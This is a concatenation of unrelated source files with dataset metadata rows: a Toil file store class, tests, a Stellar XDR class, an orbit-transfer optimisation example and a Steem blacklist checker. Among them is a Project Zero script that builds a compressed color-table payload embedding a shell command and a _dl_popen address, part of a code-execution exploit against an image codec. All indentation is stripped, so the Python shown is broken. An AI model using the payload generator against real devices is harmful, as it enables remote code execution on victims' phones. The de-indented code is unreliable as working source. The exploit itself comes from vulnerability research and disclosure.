from toil.lib.humanize import bytes2human
from toil.common import getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.fileStores.abstractFileStore import AbstractFileStore
from toil.fileStores import FileID
logger = logging.getLogger(__name__)
if sys.version_info[0] < 3:
# Define a usable FileNotFoundError as will be raised by os.oprn on a
# nonexistent parent directory.
FileNotFoundError = OSError
class NonCachingFileStore(AbstractFileStore):
def __init__(self, jobStore, jobGraph, localTempDir, waitForPreviousCommit):
super(NonCachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, waitForPreviousCommit)
# This will be defined in the `open` method.
self.jobStateFile = None
self.localFileMap = defaultdict(list)
@contextmanager
def open(self, job):
jobReqs = job.disk
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
self._removeDeadJobs(self.workDir)
self.jobStateFile = self._createJobStateFile()
freeSpace, diskSize = getFileSystemSize(self.localTempDir)
if freeSpace <= 0.1 * diskSize:
logger.warning('Starting job %s with less than 10%% of disk space remaining.',
self.jobName)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Consider modifying the user "
"script to avoid the chance of failure due to incorrectly "
"requested resources. " + logString, level=logging.WARNING)
os.chdir(startingDir)
# Finally delete the job from the worker
os.remove(self.jobStateFile)
def writeGlobalFile(self, localFileName, cleanup=False):
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
creatorID = self.jobGraph.jobStoreID
fileStoreID = self.jobStore.writeFile(absLocalFileName, creatorID, cleanup)
if absLocalFileName.startswith(self.localTempDir):
# Only files in the appropriate directory should become local files
# we can delete with deleteLocalFile
self.localFileMap[fileStoreID].append(absLocalFileName)
return FileID.forPath(fileStoreID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
else:
localFilePath = self.getLocalTempFileName()
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
self.localFileMap[fileStoreID].append(localFilePath)
return localFilePath
@contextmanager
def readGlobalFileStream(self, fileStoreID):
with self.jobStore.readFileStream(fileStoreID) as f:
yield f
def exportFile(self, jobStoreFileID, dstUrl):
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def deleteLocalFile(self, fileStoreID):
try:
localFilePaths = self.localFileMap.pop(fileStoreID)
except KeyError:
raise OSError(errno.ENOENT, "Attempting to delete local copies of a file with none")
else:
for localFilePath in localFilePaths:
os.remove(localFilePath)
def deleteGlobalFile(self, fileStoreID):
try:
self.deleteLocalFile(fileStoreID)
except OSError as e:
if e.errno == errno.ENOENT:
# the file does not exist locally, so no local deletion necessary
pass
else:
raise
self.filesToDelete.add(str(fileStoreID))
def waitForCommit(self):
# there is no asynchronicity in this file store so no need to block at all
return True
def startCommit(self, jobState=False):
# Make sure the previous job is committed, if any
if self.waitForPreviousCommit is not None:
self.waitForPreviousCommit()
if not jobState:
# All our operations that need committing are job state related
return
try:
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
def __del__(self):
"""
Cleanup function that is run when destroying the class instance. Nothing to do since there
are no async write events.
"""
pass
@classmethod
def _removeDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
Look at the state of all jobs registered in the individual job state files, and handle them
(clean up the disk)
:param str nodeInfo: The location of the workflow directory on the node.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
:return:
"""
for jobState in cls._getAllJobStates(nodeInfo):
if not process_name_exists(nodeInfo, jobState['jobProcessName']):
# We need to have a race to pick someone to clean up.
try:
# Open the directory
dirFD = os.open(jobState['jobDir'], os.O_RDONLY)
except FileNotFoundError:
# The cleanup has happened and we can't contest for it
continue
try:
# Try and lock it
fcntl.lockf(dirFD, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError as e:
# We lost the race. Someone else is alive and has it locked.
os.close(dirFD)
else:
# We got it
logger.warning('Detected that job (%s) prematurely terminated. Fixing the '
'state of the job on disk.', jobState['jobName'])
try:
if not batchSystemShutdown:
logger.debug("Deleting the stale working directory.")
# Delete the old work directory if it still exists. Do this only during
# the life of the program and dont' do it during the batch system
# cleanup. Leave that to the batch system cleanup code.
robust_rmtree(jobState['jobDir'])
finally:
fcntl.lockf(dirFD, fcntl.LOCK_UN)
os.close(dirFD)
@staticmethod
def _getAllJobStates(workflowDir):
"""
Generator function that deserializes and yields the job state for every job on the node,
one at a time.
:param str workflowDir: The location of the workflow directory on the node.
:return: dict with keys (jobName, jobProcessName, jobDir)
:rtype: dict
"""
jobStateFiles = []
# Note that the directory tree may contain files whose names are not decodable to Unicode.
# So we need to work in bytes.
# We require that the job state files aren't in any of those directories.
for root, dirs, files in os.walk(workflowDir.encode('utf-8')):
for filename in files:
if filename == '.jobState'.encode('utf-8'):
jobStateFiles.append(os.path.join(root, filename).decode('utf-8'))
for filename in jobStateFiles:
try:
yield NonCachingFileStore._readJobState(filename)
except IOError as e:
if e.errno == 2:
# job finished & deleted its jobState file since the jobState files were discovered
continue
else:
raise
@staticmethod
def _readJobState(jobStateFileName):
with open(jobStateFileName, 'rb') as fH:
state = dill.load(fH)
return state
def _createJobStateFile(self):
"""
Create the job state file for the current job and fill in the required
values.
:return: Path to the job state file
:rtype: str
"""
jobStateFile = os.path.join(self.localTempDir, '.jobState')
jobState = {'jobProcessName': get_process_name(self.workDir),
'jobName': self.jobName,
'jobDir': self.localTempDir}
with open(jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(jobStateFile + '.tmp', jobStateFile)
return jobStateFile
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The workflow directory that will contain all the individual worker directories.
"""
cls._removeDeadJobs(dir_, batchSystemShutdown=True)
| 42.197133
| 106
| 0.613013
|
4a15ce47f0456b3653144090c9651139a3eb0a18
| 1,304
|
py
|
Python
|
mms_exploit/qmg_files/code_exec/generate_color_table.py
|
googleprojectzero/SkCodecFuzzer
|
1ffd5b20121c0d6ae842de0da04d5e4d3df64f5c
|
[
"Apache-2.0"
] | 289
|
2020-05-06T16:25:03.000Z
|
2022-03-07T10:52:23.000Z
|
mms_exploit/qmg_files/code_exec/generate_color_table.py
|
googleprojectzero/SkCodecFuzzer
|
1ffd5b20121c0d6ae842de0da04d5e4d3df64f5c
|
[
"Apache-2.0"
] | 6
|
2020-05-09T02:33:35.000Z
|
2021-01-12T10:40:14.000Z
|
mms_exploit/qmg_files/code_exec/generate_color_table.py
|
googleprojectzero/SkCodecFuzzer
|
1ffd5b20121c0d6ae842de0da04d5e4d3df64f5c
|
[
"Apache-2.0"
] | 71
|
2020-05-06T16:39:46.000Z
|
2022-03-06T12:31:57.000Z
|
import struct
import sys
import zlib
def main(argv):
if len(argv) != 5:
print("Usage: %s <output file> <system command> <libhwui!ReadStreaEndError> <linker64!_dl_popen>" % argv[0])
return
BPP = 4
COLORS = 38
OUTPUT_FILE = argv[1]
COMMAND = bytearray(argv[2], encoding='ascii')
ADDR_ReadStreaEndError = int(argv[3], 16)
ADDR_dl_popen = int(argv[4], 16)
assert(len(COMMAND) < 24)
payload = (COMMAND.ljust(24, b"\x00") + struct.pack("<Q", ADDR_dl_popen)).ljust(COLORS * BPP, b"\xcc")
table = [0] * (COLORS * BPP)
for i in range(COLORS):
table[i + COLORS * 0] = payload[i * BPP + 3]
table[i + COLORS * 1] = payload[i * BPP + 2]
table[i + COLORS * 2] = payload[i * BPP + 1]
table[i + COLORS * 3] = payload[i * BPP + 0]
table = table[:-8] + list(struct.pack("<Q", ADDR_ReadStreaEndError))
for i in reversed(range(1, COLORS)):
table[i + COLORS * 0] -= table[i + COLORS * 0 - 1]
table[i + COLORS * 1] -= table[i + COLORS * 1 - 1]
table[i + COLORS * 2] -= table[i + COLORS * 2 - 1]
table[i + COLORS * 3] -= table[i + COLORS * 3 - 1]
output_data = bytes(map(lambda x: (x & 255), table))
compressed = zlib.compress(output_data)
with open(OUTPUT_FILE, "w+b") as f:
f.write(compressed)
if __name__ == "__main__":
main(sys.argv)
| 28.977778
| 112
| 0.606595
|
4a15ce7b256fb8c4c700ab56321185d37e345a02
| 4,907
|
py
|
Python
|
tests/otus/test_utils.py
|
ReeceHoffmann/virtool
|
f9befad060fe16fa29fb80124e674ac5a9c4f538
|
[
"MIT"
] | null | null | null |
tests/otus/test_utils.py
|
ReeceHoffmann/virtool
|
f9befad060fe16fa29fb80124e674ac5a9c4f538
|
[
"MIT"
] | null | null | null |
tests/otus/test_utils.py
|
ReeceHoffmann/virtool
|
f9befad060fe16fa29fb80124e674ac5a9c4f538
|
[
"MIT"
] | null | null | null |
import pytest
import virtool.otus.utils
from virtool.otus.utils import find_isolate, format_isolate_name
class TestVerify:
def test_pass(self, test_merged_otu):
"""
Test that a valid otu and sequence list results in return value of ``None``.
"""
assert virtool.otus.utils.verify(test_merged_otu) is None
def test_empty_isolate(self, test_merged_otu):
"""
Test that an isolate with no sequences is detected.
"""
test_merged_otu["isolates"][0]["sequences"] = list()
assert virtool.otus.utils.verify(test_merged_otu) == {
"empty_isolate": ["cab8b360"],
"empty_sequence": False,
"empty_otu": False,
"isolate_inconsistency": False,
}
def test_empty_sequence(self, test_merged_otu, snapshot):
"""
Test that a sequence with an empty ``sequence`` field is detected.
"""
test_merged_otu["isolates"][0]["sequences"][0]["sequence"] = ""
assert virtool.otus.utils.verify(test_merged_otu) == snapshot
def test_empty_otu(self, test_merged_otu):
"""
Test that an otu with no isolates is detected.
"""
test_merged_otu["isolates"] = []
assert virtool.otus.utils.verify(test_merged_otu) == {
"empty_isolate": False,
"empty_sequence": False,
"empty_otu": True,
"isolate_inconsistency": False,
}
def test_isolate_inconsistency(self, test_merged_otu, test_sequence):
"""
Test that isolates in a single otu with disparate sequence counts are detected.
"""
test_merged_otu["isolates"].append(
dict(test_merged_otu["isolates"][0], id="foobar")
)
test_merged_otu["isolates"][1]["sequences"] = [
dict(test_sequence, _id="foobar_1"),
dict(test_sequence, _id="foobar_2"),
]
assert virtool.otus.utils.verify(test_merged_otu) == {
"empty_isolate": False,
"empty_sequence": False,
"empty_otu": False,
"isolate_inconsistency": True,
}
def test_merge_otu(test_otu, test_sequence, test_merged_otu):
assert virtool.otus.utils.merge_otu(test_otu, [test_sequence]) == test_merged_otu
def test_split(test_otu, test_sequence, test_merged_otu):
otu, sequences = virtool.otus.utils.split(test_merged_otu)
assert otu == test_otu
assert sequences == [test_sequence]
@pytest.mark.parametrize("exists", [True, False])
def test_find_isolate(exists, test_otu, test_isolate):
new_isolate = {
**test_isolate,
"id": "foobar",
"source_type": "isolate",
"source_name": "b",
}
if exists:
test_otu["isolates"].append(new_isolate)
isolate = find_isolate(test_otu["isolates"], "foobar")
assert isolate == (new_isolate if exists else None)
class TestExtractSequenceIds:
def test_valid(self, test_merged_otu):
sequence_ids = virtool.otus.utils.extract_sequence_ids(test_merged_otu)
assert sequence_ids == ["KX269872"]
def test_missing_isolates(self, test_merged_otu):
del test_merged_otu["isolates"]
with pytest.raises(KeyError) as excinfo:
virtool.otus.utils.extract_sequence_ids(test_merged_otu)
assert "'isolates'" in str(excinfo.value)
def test_empty_isolates(self, test_merged_otu):
test_merged_otu["isolates"] = list()
with pytest.raises(ValueError) as excinfo:
virtool.otus.utils.extract_sequence_ids(test_merged_otu)
assert "Empty isolates list" in str(excinfo.value)
def test_missing_sequences(self, test_merged_otu):
del test_merged_otu["isolates"][0]["sequences"]
with pytest.raises(KeyError) as excinfo:
virtool.otus.utils.extract_sequence_ids(test_merged_otu)
assert "missing sequences field" in str(excinfo.value)
def test_empty_sequences(self, test_merged_otu):
test_merged_otu["isolates"][0]["sequences"] = list()
with pytest.raises(ValueError) as excinfo:
virtool.otus.utils.extract_sequence_ids(test_merged_otu)
assert "Empty sequences list" in str(excinfo.value)
@pytest.mark.parametrize(
"source_type, source_name", [("Isolate", ""), ("Isolate", ""), ("", "8816 - v2")]
)
def test_format_isolate_name(source_type, source_name, test_isolate):
"""
Test that a formatted isolate name is produced for a full ``source_type`` and
``source_name``.
Test that if either of these fields are missing, "Unnamed isolate" is returned.
"""
formatted = format_isolate_name(
{**test_isolate, "source_type": source_type, "source_name": source_name}
)
assert (
formatted == "Isolate 8816 - v2"
if source_type and source_name
else "Unnamed Isolate"
)
| 30.66875
| 87
| 0.647442
|
4a15cef4b96e2b9526035d1c80ae21bf202afd33
| 1,961
|
py
|
Python
|
stellar_sdk/xdr/change_trust_op.py
|
MartinThoma/py-stellar-base
|
07ab28cde7a7040f2262b224f9af8a3416c0e5ab
|
[
"Apache-2.0"
] | 1
|
2021-07-06T01:34:08.000Z
|
2021-07-06T01:34:08.000Z
|
stellar_sdk/xdr/change_trust_op.py
|
MartinThoma/py-stellar-base
|
07ab28cde7a7040f2262b224f9af8a3416c0e5ab
|
[
"Apache-2.0"
] | 36
|
2021-08-23T17:31:52.000Z
|
2022-03-28T01:39:00.000Z
|
stellar_sdk/xdr/change_trust_op.py
|
MartinThoma/py-stellar-base
|
07ab28cde7a7040f2262b224f9af8a3416c0e5ab
|
[
"Apache-2.0"
] | 1
|
2021-07-06T01:33:40.000Z
|
2021-07-06T01:33:40.000Z
|
# This is an automatically generated file.
# DO NOT EDIT or your changes may be overwritten
import base64
from xdrlib import Packer, Unpacker
from .asset import Asset
from .int64 import Int64
__all__ = ["ChangeTrustOp"]
class ChangeTrustOp:
"""
XDR Source Code
----------------------------------------------------------------
struct ChangeTrustOp
{
Asset line;
// if limit is set to 0, deletes the trust line
int64 limit;
};
----------------------------------------------------------------
"""
def __init__(
self,
line: Asset,
limit: Int64,
) -> None:
self.line = line
self.limit = limit
def pack(self, packer: Packer) -> None:
self.line.pack(packer)
self.limit.pack(packer)
@classmethod
def unpack(cls, unpacker: Unpacker) -> "ChangeTrustOp":
line = Asset.unpack(unpacker)
limit = Int64.unpack(unpacker)
return cls(
line=line,
limit=limit,
)
def to_xdr_bytes(self) -> bytes:
packer = Packer()
self.pack(packer)
return packer.get_buffer()
@classmethod
def from_xdr_bytes(cls, xdr: bytes) -> "ChangeTrustOp":
unpacker = Unpacker(xdr)
return cls.unpack(unpacker)
def to_xdr(self) -> str:
xdr_bytes = self.to_xdr_bytes()
return base64.b64encode(xdr_bytes).decode()
@classmethod
def from_xdr(cls, xdr: str) -> "ChangeTrustOp":
xdr_bytes = base64.b64decode(xdr.encode())
return cls.from_xdr_bytes(xdr_bytes)
def __eq__(self, other: object):
if not isinstance(other, self.__class__):
return NotImplemented
return self.line == other.line and self.limit == other.limit
def __str__(self):
out = [
f"line={self.line}",
f"limit={self.limit}",
]
return f"<ChangeTrustOp {[', '.join(out)]}>"
| 25.467532
| 68
| 0.54921
|
4a15cf0811b743c2918c1fcd1f974e91c567141e
| 6,942
|
py
|
Python
|
examples/10_Low_Thrust_Orbit_Transfer.py
|
likping/OpenGoddard
|
0906ee85038de85d7683e19532df62fcd53a9e28
|
[
"MIT"
] | 81
|
2017-03-06T07:38:42.000Z
|
2022-02-02T17:50:34.000Z
|
examples/10_Low_Thrust_Orbit_Transfer.py
|
likping/OpenGoddard
|
0906ee85038de85d7683e19532df62fcd53a9e28
|
[
"MIT"
] | 10
|
2017-05-17T14:07:36.000Z
|
2021-10-17T05:36:28.000Z
|
examples/10_Low_Thrust_Orbit_Transfer.py
|
likping/OpenGoddard
|
0906ee85038de85d7683e19532df62fcd53a9e28
|
[
"MIT"
] | 26
|
2017-05-21T17:29:23.000Z
|
2022-03-30T08:19:58.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2017 Interstellar Technologies Inc. All Rights Reserved.
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
from OpenGoddard.optimize import Problem, Guess, Condition, Dynamics
class Orbiter:
def __init__(self):
self.u_max = 0.01
self.r0 = 1.0
self.vr0 = 0.0
self.vt0 = 1.0
self.rf = 4.0
self.vrf = 0.0
self.vtf = 0.5
self.tf_max = 55
def dynamics(prob, obj, section):
r = prob.states(0, section)
vr = prob.states(1, section)
vt = prob.states(2, section)
ur1 = prob.controls(0, section)
ur2 = prob.controls(1, section)
ut1 = prob.controls(2, section)
ut2 = prob.controls(3, section)
dx = Dynamics(prob, section)
dx[0] = vr
dx[1] = vt**2 / r - 1 / r**2 + (ur1 - ur2)
dx[2] = - vr * vt / r + (ut1 - ut2)
return dx()
def equality(prob, obj):
r = prob.states_all_section(0)
vr = prob.states_all_section(1)
vt = prob.states_all_section(2)
ur1 = prob.controls_all_section(0)
ur2 = prob.controls_all_section(1)
ut1 = prob.controls_all_section(2)
ut2 = prob.controls_all_section(3)
tf = prob.time_final(-1)
result = Condition()
# event condition
result.equal(r[0], obj.r0)
result.equal(vr[0], obj.vr0)
result.equal(vt[0], obj.vt0)
result.equal(r[-1], obj.rf)
result.equal(vr[-1], obj.vrf)
result.equal(vt[-1], obj.vtf)
return result()
def inequality(prob, obj):
r = prob.states_all_section(0)
vr = prob.states_all_section(1)
vt = prob.states_all_section(2)
ur1 = prob.controls_all_section(0)
ur2 = prob.controls_all_section(1)
ut1 = prob.controls_all_section(2)
ut2 = prob.controls_all_section(3)
tf = prob.time_final(-1)
result = Condition()
# lower bounds
result.lower_bound(r, obj.r0)
result.lower_bound(ur1, 0.0)
result.lower_bound(ut1, 0.0)
result.lower_bound(ur2, 0.0)
result.lower_bound(ut2, 0.0)
result.lower_bound(tf, 0.0)
# upper bounds
result.upper_bound(r, obj.rf)
result.upper_bound(ur1, obj.u_max)
result.upper_bound(ut1, obj.u_max)
result.upper_bound(ur2, obj.u_max)
result.upper_bound(ut2, obj.u_max)
result.upper_bound(tf, obj.tf_max)
return result()
def cost(prob, obj):
return 0.0
def running_cost(prob, obj):
ur1 = prob.controls_all_section(0)
ur2 = prob.controls_all_section(1)
ut1 = prob.controls_all_section(2)
ut2 = prob.controls_all_section(3)
return (ur1 + ur2) + (ut1 + ut2)
# ========================
plt.close("all")
plt.ion()
# Program Starting Point
time_init = [0.0, 10.0]
n = [100]
num_states = [3]
num_controls = [4]
max_iteration = 10
flag_savefig = True
savefig_dir = "10_Low_Thrust_Orbit_Transfer/"
# ------------------------
# set OpenGoddard class for algorithm determination
prob = Problem(time_init, n, num_states, num_controls, max_iteration)
obj = Orbiter()
# ========================
# Initial parameter guess
r_init = Guess.linear(prob.time_all_section, obj.r0, obj.rf)
# Guess.plot(prob.time_all_section, r_init, "r", "time", "r")
# if(flag_savefig):plt.savefig(savefig_dir + "guess_r" + savefig_add + ".png")
vr_init = Guess.linear(prob.time_all_section, obj.vr0, obj.vrf)
# Guess.plot(prob.time_all_section, vr_init, "vr", "time", "vr")
# if(flag_savefig):plt.savefig(savefig_dir + "guess_vr" + savefig_add + ".png")
vt_init = Guess.linear(prob.time_all_section, obj.vt0, obj.vtf)
# Guess.plot(prob.time_all_section, theta_init, "vt", "time", "vt")
# if(flag_savefig):plt.savefig(savefig_dir + "guess_vt" + savefig_add + ".png")
ur1_init = Guess.linear(prob.time_all_section, obj.u_max, obj.u_max)
# Guess.plot(prob.time_all_section, ur1_init, "ur1", "time", "ur1")
# if(flag_savefig):plt.savefig(savefig_dir + "guess_ur1" + savefig_add + ".png")
ut1_init = Guess.linear(prob.time_all_section, obj.u_max, obj.u_max)
# Guess.plot(prob.time_all_section, ut1_init, "ut1", "time", "ut1")
# if(flag_savefig):plt.savefig(savefig_dir + "guess_ut1" + savefig_add + ".png")
prob.set_states_all_section(0, r_init)
prob.set_states_all_section(1, vr_init)
prob.set_states_all_section(2, vt_init)
prob.set_controls_all_section(0, ur1_init)
prob.set_controls_all_section(2, ut1_init)
# ========================
# Main Process
# Assign problem to SQP solver
prob.dynamics = [dynamics]
prob.knot_states_smooth = []
prob.cost = cost
prob.running_cost = running_cost
prob.equality = equality
prob.inequality = inequality
def display_func():
tf = prob.time_final(-1)
print("tf: {0:.5f}".format(tf))
prob.solve(obj, display_func, ftol=1e-12)
# ========================
# Post Process
# ------------------------
# Convert parameter vector to variable
r = prob.states_all_section(0)
vr = prob.states_all_section(1)
vt = prob.states_all_section(2)
ur1 = prob.controls_all_section(0)
ur2 = prob.controls_all_section(1)
ut1 = prob.controls_all_section(2)
ut2 = prob.controls_all_section(3)
time = prob.time_update()
# ------------------------
# Visualizetion
plt.figure()
plt.plot(time, r, marker="o", label="r")
for line in prob.time_knots():
plt.axvline(line, color="k", alpha=0.5)
plt.grid()
plt.xlabel("time [-]")
plt.ylabel("r [-]")
plt.legend(loc="best")
if(flag_savefig): plt.savefig(savefig_dir + "r" + ".png")
plt.figure()
plt.plot(time, vr, marker="o", label="vr")
plt.plot(time, vt, marker="o", label="vt")
for line in prob.time_knots():
plt.axvline(line, color="k", alpha=0.5)
plt.grid()
plt.xlabel("time [-]")
plt.ylabel("velocity [-]")
plt.legend(loc="best")
if(flag_savefig): plt.savefig(savefig_dir + "velocity" + ".png")
plt.figure()
plt.plot(time, (ur1 - ur2), marker="o", label="ur")
plt.plot(time, (ut1 - ut2), marker="o", label="ut")
# plt.plot(time, ur1, marker="o", label="ur1")
# plt.plot(time, ur2, marker="o", label="ur2")
# plt.plot(time, ut1, marker="o", label="ut1")
# plt.plot(time, ut2, marker="o", label="ut2")
plt.grid()
plt.xlabel("time [-]")
plt.ylabel("thrust [-]")
# plt.ylim([-0.02, 0.6])
plt.legend(loc="best")
if(flag_savefig): plt.savefig(savefig_dir + "thrust" + ".png")
from scipy import integrate
from scipy import interpolate
theta = integrate.cumtrapz(vt / r, time, initial=0)
theta_f = interpolate.interp1d(time, theta)
r_f = interpolate.interp1d(time, r)
time_fine = np.linspace(time[0], time[-1], 1000)
r_fine = r_f(time_fine)
theta_fine = theta_f(time_fine)
fig = plt.figure()
# plt.plot(r*np.cos(theta), r*np.sin(theta))
plt.plot(r_fine*np.cos(theta_fine), r_fine*np.sin(theta_fine))
ax = fig.add_subplot(111)
circle0 = plt.Circle((0.0, 0.0), 1.0, ls="--", fill=False, fc='none')
circlef = plt.Circle((0.0, 0.0), 4.0, ls="--", fill=False, fc='none')
ax.add_patch(circle0)
ax.add_patch(circlef)
plt.grid()
plt.axis('equal')
plt.ylim((-4.1, 4.1))
if(flag_savefig): plt.savefig(savefig_dir + "trajectry" + ".png")
plt.show()
| 28.45082
| 80
| 0.662489
|
4a15d05c74d2139b6a7e61a330188cea036f9cb4
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/libpasteurize/fixes/fix_fullargspec.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/libpasteurize/fixes/fix_fullargspec.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/libpasteurize/fixes/fix_fullargspec.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/56/56/6e/214e9036b0a5991baf0b89ad2c808bdf23028be45c1829d2f5f0f86fe4
| 96
| 96
| 0.895833
|
4a15d089b5457b8c899b6046bfd0cca4fc320524
| 937
|
py
|
Python
|
tests/e2e/process_thies-lnm/tests.py
|
actris-cloudnet/cloudnet-processing
|
1d1a67df3bad0beb7f8ec455e441ea06e8a32e55
|
[
"MIT"
] | null | null | null |
tests/e2e/process_thies-lnm/tests.py
|
actris-cloudnet/cloudnet-processing
|
1d1a67df3bad0beb7f8ec455e441ea06e8a32e55
|
[
"MIT"
] | null | null | null |
tests/e2e/process_thies-lnm/tests.py
|
actris-cloudnet/cloudnet-processing
|
1d1a67df3bad0beb7f8ec455e441ea06e8a32e55
|
[
"MIT"
] | null | null | null |
from os import path
import netCDF4
import pytest
SCRIPT_PATH = path.dirname(path.realpath(__file__))
class TestProcessing:
@pytest.fixture(autouse=True)
def _fetch_params(self, params):
self.full_path = params["full_path"]
self.nc = netCDF4.Dataset(self.full_path)
yield
self.nc.close()
def test_attributes(self):
assert self.nc.year == "2021"
assert self.nc.month == "09"
assert self.nc.day == "15"
assert self.nc.cloudnet_file_type == "disdrometer"
assert self.nc.Conventions == "CF-1.8"
assert hasattr(self.nc, "pid") is False
assert hasattr(self.nc, "cloudnetpy_version")
assert hasattr(self.nc, "cloudnet_processing_version")
def test_time_is_sorted(self):
time = self.nc.variables["time"][:]
assert len(time) == 120
for ind, t in enumerate(time[:-1]):
assert time[ind + 1] > t
| 29.28125
| 62
| 0.629669
|
4a15d0e75211f01e76c7e3320a29a404e6a5a975
| 4,409
|
py
|
Python
|
sbi_check_blacklist.py
|
haroldham/steembasicincome
|
ce5b78ce35dba9cedad6a44eda4cb332bad53e49
|
[
"MIT"
] | null | null | null |
sbi_check_blacklist.py
|
haroldham/steembasicincome
|
ce5b78ce35dba9cedad6a44eda4cb332bad53e49
|
[
"MIT"
] | null | null | null |
sbi_check_blacklist.py
|
haroldham/steembasicincome
|
ce5b78ce35dba9cedad6a44eda4cb332bad53e49
|
[
"MIT"
] | null | null | null |
from beem import Steem
from beem.nodelist import NodeList
from beem.utils import formatTimeString
from datetime import datetime, timedelta
import requests
import json
import os
import dataset
from steembi.storage import TrxDB, MemberDB, ConfigurationDB, KeysDB, TransactionMemoDB
from steembi.transfer_ops_storage import TransferTrx
from steembi.member import Member
if __name__ == "__main__":
config_file = 'config.json'
if not os.path.isfile(config_file):
raise Exception("config.json is missing!")
else:
with open(config_file) as json_data_file:
config_data = json.load(json_data_file)
accounts = config_data["accounts"]
databaseConnector = config_data["databaseConnector"]
databaseConnector2 = config_data["databaseConnector2"]
other_accounts = config_data["other_accounts"]
mgnt_shares = config_data["mgnt_shares"]
hive_blockchain = config_data["hive_blockchain"]
db2 = dataset.connect(databaseConnector2)
db = dataset.connect(databaseConnector)
transferStorage = TransferTrx(db)
# Create keyStorage
trxStorage = TrxDB(db2)
keyStorage = KeysDB(db2)
memberStorage = MemberDB(db2)
confStorage = ConfigurationDB(db2)
transactionStorage = TransactionMemoDB(db2)
conf_setup = confStorage.get()
last_cycle = conf_setup["last_cycle"]
share_cycle_min = conf_setup["share_cycle_min"]
sp_share_ratio = conf_setup["sp_share_ratio"]
rshares_per_cycle = conf_setup["rshares_per_cycle"]
upvote_multiplier = conf_setup["upvote_multiplier"]
last_paid_post = conf_setup["last_paid_post"]
last_paid_comment = conf_setup["last_paid_comment"]
print("last_cycle: %s - %.2f min" % (
formatTimeString(last_cycle), (datetime.utcnow() - last_cycle).total_seconds() / 60))
if last_cycle is None:
last_cycle = datetime.utcnow() - timedelta(seconds=60 * 145)
confStorage.update({"last_cycle": last_cycle})
elif True: # doing same maintanence
data = trxStorage.get_all_data()
data = sorted(data, key=lambda x: (datetime.utcnow() - x["timestamp"]).total_seconds(), reverse=True)
key_list = []
key = keyStorage.get("steembasicincome", "memo")
if key is not None:
key_list.append(key["wif"])
nodes = NodeList()
try:
nodes.update_nodes()
except:
print("could not update nodes")
stm = Steem(keys=key_list, node=nodes.get_nodes(hive=hive_blockchain))
if True: # check if member are blacklisted
member_accounts = memberStorage.get_all_accounts()
member_data = {}
n_records = 0
share_age_member = {}
for m in member_accounts:
member_data[m] = Member(memberStorage.get(m))
cnt = 0
member_data_list = []
for m in member_data:
cnt += 1
if cnt % 100 == 0:
print("%d/%d" % (cnt, len(member_data)))
if len(member_data_list) > 0:
memberStorage.add_batch(member_data_list)
member_data_list = []
response = ""
cnt2 = 0
while str(response) != '<Response [200]>' and cnt2 < 10:
if hive_blockchain:
response = requests.get("http://blacklist.usehive.com/user/%s" % m)
else:
response = requests.get("http://blacklist.usesteem.com/user/%s" % m)
cnt2 += 1
if "blacklisted" in response.json():
if "steemcleaners" in response.json()["blacklisted"]:
member_data[m]["steemcleaners"] = True
else:
member_data[m]["steemcleaners"] = False
if "buildawhale" in response.json()["blacklisted"]:
member_data[m]["buildawhale"] = True
else:
member_data[m]["buildawhale"] = False
member_data_list.append(member_data[m])
if len(member_data_list) > 0:
memberStorage.add_batch(member_data_list)
member_data_list = []
| 41.990476
| 110
| 0.58993
|
4a15d230b21aadc3f8a0825ca0c2d81e24aa30b0
| 2,096
|
py
|
Python
|
pinax/announcements/models.py
|
craigds/pinax-announcements
|
ceaa4f0fcef25a5928a0cfbbf50c74a9afd263ab
|
[
"MIT"
] | 34
|
2016-03-29T22:09:16.000Z
|
2022-03-22T11:15:23.000Z
|
pinax/announcements/models.py
|
craigds/pinax-announcements
|
